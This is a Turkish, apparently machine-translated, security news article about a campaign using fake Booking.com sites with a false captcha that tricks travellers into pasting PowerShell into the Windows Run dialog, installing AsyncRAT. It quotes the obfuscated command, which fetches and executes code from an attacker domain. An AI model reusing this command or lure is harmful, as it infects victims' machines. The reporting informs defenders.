Siber suçlular, son güvenlik araştırmalarına göre, Gezginleri sahte Booking.com web siteleri aracılığıyla hedefleyen karmaşık bir kampanya başlattı.
Tehdit oyuncusu, kullanıcıları oyun sitelerinden, sosyal medya platformlarından ve sponsorlu reklamlardan, ziyaretçi cihazlarını tehlikeye atmak için tasarlanmış ikna edici kopya rezervasyon sitelerine yönlendirir.
Bu saldırı, insanların% 40’ının genel çevrimiçi aramalarda seyahat etmesinden ve sömürü için bol miktarda fırsat yaratmasından yararlanmaktadır.
.png
)
Kötü niyetli kampanya, kurbanları görünüşte meşru etkileşimler yoluyla gönüllü olarak kendi sistemlerini enfekte etmek için kandıran aldatıcı taktikler kullanıyor.
Kullanıcılar bu hileli rezervasyon sitelerine indiğinde, meşru web sitelerinde ortak bir güvenlik önlemi olan standart bir Captcha doğrulama istemi gibi görünen şeylerle karşılaşırlar.
Ancak, bu sahte captcha, kötü amaçlı yazılım dağıtım mekanizması için giriş noktası olarak hizmet vermektedir.
.webp)
Malwarebebytes analistleri, sahte Captcha’nın kötü niyetli PowerShell komutlarını otomatik olarak kurbanın panosuna bilgileri olmadan kopyaladığını belirledi.
Kopyalanan içerik başlangıçta, karışık kasa, teklif kesintisi ve değişken adı manipülasyonu dahil olmak üzere saldırganlar tarafından kullanılan kasıtlı gizleme teknikleri nedeniyle bozulmuş metin olarak görünür.
Gerçek kötü amaçlı komut, kod çözüldüğünde, kötü amaçlı yazılımları indirmek ve yürütmek için tasarlanmış bir PowerShell komut dosyasını ortaya çıkarır.
Gizli komut şu şekilde görünür: pOwERsheLl -N"O"p"ro" /w h -C"Om"ManD "\$b"a"np = 'b"kn"g"n"et.com';\$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri \$ba"n"p; I"nv"oke"-"E"xp"r"es"sion \$r"k"v".
Yürütüldüğünde, bu, daha sonra Stub.exe’yi geri alan ve yürüten ve sonuçta asyncrat arka kapısını kurbanın sistemine dağıtan CKJG.EXE’yi indiren gizli bir PowerShell penceresine dönüşür.
Enfeksiyon mekanizması ve sosyal mühendislik taktikleri
Saldırının sofistike olması, kullanıcı güvenini ve ortak web etkileşimlerine aşina olmasında yatmaktadır.
.webp)
Kötü niyetli içerik panoya kopyalandıktan sonra, kurbanlar, rezervasyon süreçlerini tamamlamak için gerekli adımlar olarak sunulan Windows Run iletişim kutusundan komutları yapıştırma ve yürütme talimatları alır.
Bu sosyal mühendislik yaklaşımı, meşru web sitesi prosedürlerini takip ettiklerine inanırken kötü amaçlı yazılım kurulumuna aktif olarak katıldıkları için mağdurları kendi uzlaşmalarında istenmeyen suç ortağına dönüştürür.
Tehdit istihbarat aramasıyla tehdit araştırmalarını hızlandırın ve zenginleştirin! -> 50 Deneme Arama İsteği